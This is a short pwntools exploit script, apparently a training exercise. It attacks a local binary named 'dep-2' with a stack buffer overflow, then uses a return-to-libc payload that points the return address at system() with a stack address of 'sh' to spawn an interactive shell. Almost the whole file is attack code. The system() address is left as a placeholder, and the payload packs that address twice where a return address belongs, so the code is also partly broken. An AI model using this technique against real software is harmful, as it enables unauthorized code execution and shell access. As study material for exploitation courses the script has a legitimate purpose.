#!/usr/bin/env python

from pwn import *

# open a process
p = process("./dep-2")

# Check the buffer info from gdb - disas input_func
# -0x88(%ebp)...

# prepare a string to crash
#[ buffer (0x88)][saved ebp][ret]
string = "A" * 0x88 + "BBBB" + "CCCC" #(0x43434343)

p.send(string)

p.wait()

# Let's get the address of 'sh'
c = Core('core')

addr_of_sh = c.stack.find('sh')
print("Stack %s" % hex(addr_of_sh))


# Let's run system...
# get the address from gdb - by running 'b main', 'run', 'print system'

addr_system = XXXX
p = process("./dep-2")

#[ buffer (0x88)][saved ebp][ret]
#[ buffer (0x88)][saved ebp][ system() ][XXXX][addr_of_sh]

                                # // address of system...
string = "A" * 0x88 + "BBBB" + p32(addr_system) + p32(addr_system) + \
        p32(addr_of_sh) + p32(addr_of_sh)


p.send(string)

p.interactive()

quit()